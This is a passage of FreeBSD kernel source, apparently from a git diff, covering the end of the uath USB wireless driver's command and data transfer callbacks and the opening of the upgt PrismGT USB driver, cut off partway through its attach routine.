UATH_SYSCTL_STAT_ADD32(ctx, child, "phyerr", &stats->st_phyerr, "PHY errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decrypt_crcerr", &stats->st_decrypt_crcerr, "Decryption CRC errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decrypt_micerr", &stats->st_decrypt_micerr, "Decryption Misc errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "decomperr", &stats->st_decomperr, "Decomp errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "keyerr", &stats->st_keyerr, "Key errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "err", &stats->st_err, "Unknown errors"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_active", &stats->st_cmd_active, "Active numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_inactive", &stats->st_cmd_inactive, "Inactive numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_pending", &stats->st_cmd_pending, "Pending numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "cmd_waiting", &stats->st_cmd_waiting, "Waiting numbers in Command queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "rx_active", &stats->st_rx_active, "Active numbers in RX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "rx_inactive", &stats->st_rx_inactive, "Inactive numbers in RX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_active", &stats->st_tx_active, "Active numbers in TX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_inactive", &stats->st_tx_inactive, "Inactive numbers in TX queue"); UATH_SYSCTL_STAT_ADD32(ctx, child, "tx_pending", &stats->st_tx_pending, "Pending numbers in TX queue"); } #undef UATH_SYSCTL_STAT_ADD32 static void uath_cmdeof(struct uath_softc *sc, struct uath_cmd *cmd) { struct uath_cmd_hdr *hdr; int dlen; hdr = (struct uath_cmd_hdr *)cmd->buf; /* NB: msgid is passed thru w/o byte swapping */ #ifdef UATH_DEBUG if (sc->sc_debug & UATH_DEBUG_CMDS) { int len = be32toh(hdr->len); printf("%s: %s [ix %u] len %u status %u\n", __func__, uath_codename(be32toh(hdr->code)), hdr->msgid, len, be32toh(hdr->magic)); if (sc->sc_debug & UATH_DEBUG_CMDS_DUMP) uath_dump_cmd(cmd->buf, len > UATH_MAX_CMDSZ ? sizeof(*hdr) : len, '-'); } #endif hdr->code = be32toh(hdr->code); hdr->len = be32toh(hdr->len); hdr->magic = be32toh(hdr->magic); /* target status on return */ switch (hdr->code & 0xff) { /* reply to a read command */ default: dlen = hdr->len - sizeof(*hdr); if (dlen < 0) { device_printf(sc->sc_dev, "Invalid header length %d\n", dlen); return; } DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: code %d data len %u\n", __func__, hdr->code & 0xff, dlen); /* * The first response from the target after the * HOST_AVAILABLE has an invalid msgid so we must * treat it specially. */ if (hdr->msgid < UATH_CMD_LIST_COUNT) { uint32_t *rp = (uint32_t *)(hdr+1); u_int olen; if (!(sizeof(*hdr) <= hdr->len && hdr->len < UATH_MAX_CMDSZ)) { device_printf(sc->sc_dev, "%s: invalid WDC msg length %u; " "msg ignored\n", __func__, hdr->len); return; } /* * Calculate return/receive payload size; the * first word, if present, always gives the * number of bytes--unless it's 0 in which * case a single 32-bit word should be present. */ if (dlen >= (int)sizeof(uint32_t)) { olen = be32toh(rp[0]); dlen -= sizeof(uint32_t); if (olen == 0) { /* convention is 0 =>'s one word */ olen = sizeof(uint32_t); /* XXX KASSERT(olen == dlen ) */ } } else olen = 0; if (cmd->odata != NULL) { /* NB: cmd->olen validated in uath_cmd */ if (olen > (u_int)cmd->olen) { /* XXX complain? */ device_printf(sc->sc_dev, "%s: cmd 0x%x olen %u cmd olen %u\n", __func__, hdr->code, olen, cmd->olen); olen = cmd->olen; } if (olen > (u_int)dlen) { /* XXX complain, shouldn't happen */ device_printf(sc->sc_dev, "%s: cmd 0x%x olen %u dlen %u\n", __func__, hdr->code, olen, dlen); olen = dlen; } /* XXX have submitter do this */ /* copy answer into caller's supplied buffer */ bcopy(&rp[1], cmd->odata, olen); cmd->olen = olen; } } wakeup_one(cmd); /* wake up caller */ break; case WDCMSG_TARGET_START: if (hdr->msgid >= UATH_CMD_LIST_COUNT) { /* XXX */ return; } dlen = hdr->len - sizeof(*hdr); if (dlen != (int)sizeof(uint32_t)) { /* XXX something wrong */ return; } /* XXX have submitter do this */ /* copy answer into caller's supplied buffer */ bcopy(hdr+1, cmd->odata, sizeof(uint32_t)); cmd->olen = sizeof(uint32_t); wakeup_one(cmd); /* wake up caller */ break; case WDCMSG_SEND_COMPLETE: /* this notification is sent when UATH_TX_NOTIFY is set */ DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: received Tx notification\n", __func__); break; case WDCMSG_TARGET_GET_STATS: DPRINTF(sc, UATH_DEBUG_RX_PROC | UATH_DEBUG_RECV_ALL, "%s: received device statistics\n", __func__); callout_reset(&sc->stat_ch, hz, uath_stat, sc); break; } } static void uath_intr_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct uath_cmd *cmd; struct usb_page_cache *pc; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: cmd = STAILQ_FIRST(&sc->sc_cmd_waiting); if (cmd == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_cmd_waiting, next); UATH_STAT_DEC(sc, st_cmd_waiting); STAILQ_INSERT_TAIL(&sc->sc_cmd_inactive, cmd, next); UATH_STAT_INC(sc, st_cmd_inactive); KASSERT(actlen >= (int)sizeof(struct uath_cmd_hdr), ("short xfer error")); pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, cmd->buf, actlen); uath_cmdeof(sc, cmd); case USB_ST_SETUP: setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static void uath_intr_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct uath_cmd *cmd; UATH_ASSERT_LOCKED(sc); cmd = STAILQ_FIRST(&sc->sc_cmd_active); if (cmd != NULL && USB_GET_STATE(xfer) != USB_ST_SETUP) { STAILQ_REMOVE_HEAD(&sc->sc_cmd_active, next); UATH_STAT_DEC(sc, st_cmd_active); STAILQ_INSERT_TAIL((cmd->flags & UATH_CMD_FLAG_READ) ? &sc->sc_cmd_waiting : &sc->sc_cmd_inactive, cmd, next); if (cmd->flags & UATH_CMD_FLAG_READ) UATH_STAT_INC(sc, st_cmd_waiting); else UATH_STAT_INC(sc, st_cmd_inactive); } switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: case USB_ST_SETUP: setup: cmd = STAILQ_FIRST(&sc->sc_cmd_pending); if (cmd == NULL) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_cmd_pending, next); UATH_STAT_DEC(sc, st_cmd_pending); STAILQ_INSERT_TAIL((cmd->flags & UATH_CMD_FLAG_ASYNC) ? &sc->sc_cmd_inactive : &sc->sc_cmd_active, cmd, next); if (cmd->flags & UATH_CMD_FLAG_ASYNC) UATH_STAT_INC(sc, st_cmd_inactive); else UATH_STAT_INC(sc, st_cmd_active); usbd_xfer_set_frame_data(xfer, 0, cmd->buf, cmd->buflen); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static void uath_update_rxstat(struct uath_softc *sc, uint32_t status) { switch (status) { case UATH_STATUS_STOP_IN_PROGRESS: UATH_STAT_INC(sc, st_stopinprogress); break; case UATH_STATUS_CRC_ERR: UATH_STAT_INC(sc, st_crcerr); break; case UATH_STATUS_PHY_ERR: UATH_STAT_INC(sc, st_phyerr); break; case UATH_STATUS_DECRYPT_CRC_ERR: UATH_STAT_INC(sc, st_decrypt_crcerr); break; case UATH_STATUS_DECRYPT_MIC_ERR: UATH_STAT_INC(sc, st_decrypt_micerr); break; case UATH_STATUS_DECOMP_ERR: UATH_STAT_INC(sc, st_decomperr); break; case UATH_STATUS_KEY_ERR: UATH_STAT_INC(sc, st_keyerr); break; case UATH_STATUS_ERR: UATH_STAT_INC(sc, st_err); break; default: break; } } static struct mbuf * uath_data_rxeof(struct usb_xfer *xfer, struct uath_data *data, struct uath_rx_desc **pdesc) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct uath_chunk *chunk; struct uath_rx_desc *desc; struct mbuf *m = data->m, *mnew, *mp; uint16_t chunklen; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen < (int)UATH_MIN_RXBUFSZ) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: wrong xfer size (len=%d)\n", __func__, actlen); ifp->if_ierrors++; return (NULL); } chunk = (struct uath_chunk *)data->buf; if (chunk->seqnum == 0 && chunk->flags == 0 && chunk->length == 0) { device_printf(sc->sc_dev, "%s: strange response\n", __func__); ifp->if_ierrors++; UATH_RESET_INTRX(sc); return (NULL); } if (chunk->seqnum != sc->sc_intrx_nextnum) { DPRINTF(sc, UATH_DEBUG_XMIT, "invalid seqnum %d, expected %d\n", chunk->seqnum, sc->sc_intrx_nextnum); UATH_STAT_INC(sc, st_badchunkseqnum); if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } /* check multi-chunk frames */ if ((chunk->seqnum == 0 && !(chunk->flags & UATH_CFLAGS_FINAL)) || (chunk->seqnum != 0 && (chunk->flags & UATH_CFLAGS_FINAL)) || chunk->flags & UATH_CFLAGS_RXMSG) UATH_STAT_INC(sc, st_multichunk); chunklen = be16toh(chunk->length); if (chunk->flags & UATH_CFLAGS_FINAL) chunklen -= sizeof(struct uath_rx_desc); if (chunklen > 0 && (!(chunk->flags & UATH_CFLAGS_FINAL) || !(chunk->seqnum == 0))) { /* we should use intermediate RX buffer */ if (chunk->seqnum == 0) UATH_RESET_INTRX(sc); if ((sc->sc_intrx_len + sizeof(struct uath_rx_desc) + chunklen) > UATH_MAX_INTRX_SIZE) { UATH_STAT_INC(sc, st_invalidlen); ifp->if_iqdrops++; if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } m->m_len = chunklen; m->m_data += sizeof(struct uath_chunk); if (sc->sc_intrx_head == NULL) { sc->sc_intrx_head = m; sc->sc_intrx_tail = m; } else { m->m_flags &= ~M_PKTHDR; sc->sc_intrx_tail->m_next = m; sc->sc_intrx_tail = m; } } sc->sc_intrx_len += chunklen; mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: can't get new mbuf, drop frame\n", __func__); ifp->if_ierrors++; if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } data->m = mnew; data->buf = mtod(mnew, uint8_t *); /* if the frame is not final continue the transfer */ if (!(chunk->flags & UATH_CFLAGS_FINAL)) { sc->sc_intrx_nextnum++; UATH_RESET_INTRX(sc); return (NULL); } /* * if the frame is not set UATH_CFLAGS_RXMSG, then rx descriptor is * located at the end, 32-bit aligned */ desc = (chunk->flags & UATH_CFLAGS_RXMSG) ? (struct uath_rx_desc *)(chunk + 1) : (struct uath_rx_desc *)(((uint8_t *)chunk) + sizeof(struct uath_chunk) + be16toh(chunk->length) - sizeof(struct uath_rx_desc)); *pdesc = desc; DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: frame len %u code %u status %u rate %u antenna %u " "rssi %d channel %u phyerror %u connix %u decrypterror %u " "keycachemiss %u\n", __func__, be32toh(desc->framelen) , be32toh(desc->code), be32toh(desc->status), be32toh(desc->rate) , be32toh(desc->antenna), be32toh(desc->rssi), be32toh(desc->channel) , be32toh(desc->phyerror), be32toh(desc->connix) , be32toh(desc->decrypterror), be32toh(desc->keycachemiss)); if (be32toh(desc->len) > MCLBYTES) { DPRINTF(sc, UATH_DEBUG_RECV | UATH_DEBUG_RECV_ALL, "%s: bad descriptor (len=%d)\n", __func__, be32toh(desc->len)); ifp->if_iqdrops++; UATH_STAT_INC(sc, st_toobigrxpkt); if (sc->sc_intrx_head != NULL) m_freem(sc->sc_intrx_head); UATH_RESET_INTRX(sc); return (NULL); } uath_update_rxstat(sc, be32toh(desc->status)); /* finalize mbuf */ if (sc->sc_intrx_head == NULL) { m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = be32toh(desc->framelen) - UATH_RX_DUMMYSIZE; m->m_data += sizeof(struct uath_chunk); } else { mp = sc->sc_intrx_head; mp->m_pkthdr.rcvif = ifp; mp->m_flags |= M_PKTHDR; mp->m_pkthdr.len = sc->sc_intrx_len; m = mp; } /* there are a lot more fields in the RX descriptor */ if ((sc->sc_flags & UATH_FLAG_INVALID) == 0 && ieee80211_radiotap_active(ic)) { struct uath_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_hi = be32toh(desc->tstamp_high); uint32_t tsf_lo = be32toh(desc->tstamp_low); /* XXX only get low order 24bits of tsf from h/w */ tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; if (be32toh(desc->status) == UATH_STATUS_CRC_ERR) tap->wr_flags |= IEEE80211_RADIOTAP_F_BADFCS; /* XXX map other status to BADFCS? */ /* XXX ath h/w rate code, need to map */ tap->wr_rate = be32toh(desc->rate); tap->wr_antenna = be32toh(desc->antenna); tap->wr_antsignal = -95 + be32toh(desc->rssi); tap->wr_antnoise = -95; } ifp->if_ipackets++; UATH_RESET_INTRX(sc); return (m); } static void uath_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct uath_data *data; struct uath_rx_desc *desc = NULL; int8_t nf; UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); UATH_STAT_DEC(sc, st_rx_active); m = uath_data_rxeof(xfer, data, &desc); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); UATH_STAT_INC(sc, st_rx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) return; STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); UATH_STAT_DEC(sc, st_rx_inactive); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); UATH_STAT_INC(sc, st_rx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, MCLBYTES); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ if (sc->sc_flags & UATH_FLAG_INVALID) { if (m != NULL) m_freem(m); return; } UATH_UNLOCK(sc); if (m != NULL && desc != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = -95; /* XXX */ if (ni != NULL) { (void) ieee80211_input(ni, m, (int)be32toh(desc->rssi), nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, (int)be32toh(desc->rssi), nf); m = NULL; desc = NULL; } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) uath_start(ifp); UATH_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. */ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); UATH_STAT_DEC(sc, st_rx_active); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); UATH_STAT_INC(sc, st_rx_inactive); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void uath_data_txeof(struct usb_xfer *xfer, struct uath_data *data) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; UATH_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB && (sc->sc_flags & UATH_FLAG_INVALID) == 0) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { if ((sc->sc_flags & UATH_FLAG_INVALID) == 0) ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_tx_timer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void uath_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct uath_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct uath_data *data; UATH_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); UATH_STAT_DEC(sc, st_tx_active); uath_data_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UATH_STAT_INC(sc, st_tx_inactive); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, UATH_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); UATH_STAT_DEC(sc, st_tx_pending); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); UATH_STAT_INC(sc, st_tx_active); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); UATH_UNLOCK(sc); uath_start(ifp); UATH_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { if ((sc->sc_flags & UATH_FLAG_INVALID) == 0) ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static device_method_t uath_methods[] = { DEVMETHOD(device_probe, uath_match), DEVMETHOD(device_attach, uath_attach), DEVMETHOD(device_detach, uath_detach), DEVMETHOD_END }; static driver_t uath_driver = { .name = "uath", .methods = uath_methods, .size = sizeof(struct uath_softc) }; static devclass_t uath_devclass; DRIVER_MODULE(uath, uhub, uath_driver, uath_devclass, NULL, 0); MODULE_DEPEND(uath, wlan, 1, 1, 1); MODULE_DEPEND(uath, usb, 1, 1, 1); MODULE_VERSION(uath, 1); diff --git a/sys/dev/usb/wlan/if_upgt.c b/sys/dev/usb/wlan/if_upgt.c index 6c77b3bf358f..a860a2b6910b 100644 --- a/sys/dev/usb/wlan/if_upgt.c +++ b/sys/dev/usb/wlan/if_upgt.c @@ -1,2452 +1,2452 @@ /* $OpenBSD: if_upgt.c,v 1.35 2008/04/16 18:32:15 damien Exp $ */ /* $FreeBSD$ */ /* * Copyright (c) 2007 Marcus Glocker * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #include /* * Driver for the USB PrismGT devices. * * For now just USB 2.0 devices with the GW3887 chipset are supported. * The driver has been written based on the firmware version 2.13.1.0_LM87. * * TODO's: * - MONITOR mode test. * - Add HOSTAP mode. * - Add IBSS mode. * - Support the USB 1.0 devices (NET2280, ISL3880, ISL3886 chipsets). * * Parts of this driver has been influenced by reading the p54u driver * written by Jean-Baptiste Note and * Sebastien Bourdeauducq . */ static SYSCTL_NODE(_hw, OID_AUTO, upgt, CTLFLAG_RD, 0, "USB PrismGT GW3887 driver parameters"); #ifdef UPGT_DEBUG int upgt_debug = 0; SYSCTL_INT(_hw_upgt, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &upgt_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.upgt.debug", &upgt_debug); enum { UPGT_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ UPGT_DEBUG_RECV = 0x00000002, /* basic recv operation */ UPGT_DEBUG_RESET = 0x00000004, /* reset processing */ UPGT_DEBUG_INTR = 0x00000008, /* INTR */ UPGT_DEBUG_TX_PROC = 0x00000010, /* tx ISR proc */ UPGT_DEBUG_RX_PROC = 0x00000020, /* rx ISR proc */ UPGT_DEBUG_STATE = 0x00000040, /* 802.11 state transitions */ UPGT_DEBUG_STAT = 0x00000080, /* statistic */ UPGT_DEBUG_FW = 0x00000100, /* firmware */ UPGT_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif /* * Prototypes. */ static device_probe_t upgt_match; static device_attach_t upgt_attach; static device_detach_t upgt_detach; static int upgt_alloc_tx(struct upgt_softc *); static int upgt_alloc_rx(struct upgt_softc *); static int upgt_device_reset(struct upgt_softc *); static void upgt_bulk_tx(struct upgt_softc *, struct upgt_data *); static int upgt_fw_verify(struct upgt_softc *); static int upgt_mem_init(struct upgt_softc *); static int upgt_fw_load(struct upgt_softc *); static int upgt_fw_copy(const uint8_t *, char *, int); static uint32_t upgt_crc32_le(const void *, size_t); static struct mbuf * upgt_rxeof(struct usb_xfer *, struct upgt_data *, int *); static struct mbuf * upgt_rx(struct upgt_softc *, uint8_t *, int, int *); static void upgt_txeof(struct usb_xfer *, struct upgt_data *); static int upgt_eeprom_read(struct upgt_softc *); static int upgt_eeprom_parse(struct upgt_softc *); static void upgt_eeprom_parse_hwrx(struct upgt_softc *, uint8_t *); static void upgt_eeprom_parse_freq3(struct upgt_softc *, uint8_t *, int); static void upgt_eeprom_parse_freq4(struct upgt_softc *, uint8_t *, int); static void upgt_eeprom_parse_freq6(struct upgt_softc *, uint8_t *, int); static uint32_t upgt_chksum_le(const uint32_t *, size_t); static void upgt_tx_done(struct upgt_softc *, uint8_t *); static void upgt_init(void *); static void upgt_init_locked(struct upgt_softc *); static int upgt_ioctl(struct ifnet *, u_long, caddr_t); static void upgt_start(struct ifnet *); static int upgt_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void upgt_scan_start(struct ieee80211com *); static void upgt_scan_end(struct ieee80211com *); static void upgt_set_channel(struct ieee80211com *); static struct ieee80211vap *upgt_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void upgt_vap_delete(struct ieee80211vap *); static void upgt_update_mcast(struct ifnet *); static uint8_t upgt_rx_rate(struct upgt_softc *, const int); static void upgt_set_multi(void *); static void upgt_stop(struct upgt_softc *); static void upgt_setup_rates(struct ieee80211vap *, struct ieee80211com *); static int upgt_set_macfilter(struct upgt_softc *, uint8_t); static int upgt_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void upgt_set_chan(struct upgt_softc *, struct ieee80211_channel *); static void upgt_set_led(struct upgt_softc *, int); static void upgt_set_led_blink(void *); static void upgt_get_stats(struct upgt_softc *); static void upgt_mem_free(struct upgt_softc *, uint32_t); static uint32_t upgt_mem_alloc(struct upgt_softc *); static void upgt_free_tx(struct upgt_softc *); static void upgt_free_rx(struct upgt_softc *); static void upgt_watchdog(void *); static void upgt_abort_xfers(struct upgt_softc *); static void upgt_abort_xfers_locked(struct upgt_softc *); static void upgt_sysctl_node(struct upgt_softc *); static struct upgt_data * upgt_getbuf(struct upgt_softc *); static struct upgt_data * upgt_gettxbuf(struct upgt_softc *); static int upgt_tx_start(struct upgt_softc *, struct mbuf *, struct ieee80211_node *, struct upgt_data *); static const char *upgt_fwname = "upgt-gw3887"; static const STRUCT_USB_HOST_ID upgt_devs[] = { #define UPGT_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } /* version 2 devices */ UPGT_DEV(ACCTON, PRISM_GT), UPGT_DEV(BELKIN, F5D7050), UPGT_DEV(CISCOLINKSYS, WUSB54AG), UPGT_DEV(CONCEPTRONIC, PRISM_GT), UPGT_DEV(DELL, PRISM_GT_1), UPGT_DEV(DELL, PRISM_GT_2), UPGT_DEV(FSC, E5400), UPGT_DEV(GLOBESPAN, PRISM_GT_1), UPGT_DEV(GLOBESPAN, PRISM_GT_2), UPGT_DEV(NETGEAR, WG111V2_2), UPGT_DEV(INTERSIL, PRISM_GT), UPGT_DEV(SMC, 2862WG), UPGT_DEV(USR, USR5422), UPGT_DEV(WISTRONNEWEB, UR045G), UPGT_DEV(XYRATEX, PRISM_GT_1), UPGT_DEV(XYRATEX, PRISM_GT_2), UPGT_DEV(ZCOM, XG703A), UPGT_DEV(ZCOM, XM142) }; static usb_callback_t upgt_bulk_rx_callback; static usb_callback_t upgt_bulk_tx_callback; static const struct usb_config upgt_config[UPGT_N_XFERS] = { [UPGT_BULK_TX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = MCLBYTES * UPGT_TX_MAXCOUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1 }, .callback = upgt_bulk_tx_callback, .timeout = UPGT_USB_TIMEOUT, /* ms */ }, [UPGT_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = MCLBYTES * UPGT_RX_MAXCOUNT, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = upgt_bulk_rx_callback, }, }; static int upgt_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != UPGT_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != UPGT_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(upgt_devs, sizeof(upgt_devs), uaa)); } static int upgt_attach(device_t dev) { int error; struct ieee80211com *ic; struct ifnet *ifp; struct upgt_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); uint8_t bands, iface_index = UPGT_IFACE_INDEX; sc->sc_dev = dev; sc->sc_udev = uaa->device; #ifdef UPGT_DEBUG sc->sc_debug = upgt_debug; #endif device_set_usb_desc(dev); mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->sc_led_ch, 0); callout_init(&sc->sc_watchdog_ch, 0); error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, upgt_config, UPGT_N_XFERS, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto fail1; } sc->sc_rx_dma_buf = usbd_xfer_get_frame_buffer( sc->sc_xfer[UPGT_BULK_RX], 0); sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer( sc->sc_xfer[UPGT_BULK_TX], 0); /* Setup TX and RX buffers */ error = upgt_alloc_tx(sc); if (error) goto fail2; error = upgt_alloc_rx(sc); if (error) goto fail3; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); goto fail4; } /* Initialize the device. */ error = upgt_device_reset(sc); if (error) goto fail5; /* Verify the firmware. */ error = upgt_fw_verify(sc); if (error) goto fail5; /* Calculate device memory space. */ if (sc->sc_memaddr_frame_start == 0 || sc->sc_memaddr_frame_end == 0) { device_printf(dev, "could not find memory space addresses on FW\n"); error = EIO; goto fail5; } sc->sc_memaddr_frame_end -= UPGT_MEMSIZE_RX + 1; sc->sc_memaddr_rx_start = sc->sc_memaddr_frame_end + 1; DPRINTF(sc, UPGT_DEBUG_FW, "memory address frame start=0x%08x\n", sc->sc_memaddr_frame_start); DPRINTF(sc, UPGT_DEBUG_FW, "memory address frame end=0x%08x\n", sc->sc_memaddr_frame_end); DPRINTF(sc, UPGT_DEBUG_FW, "memory address rx start=0x%08x\n", 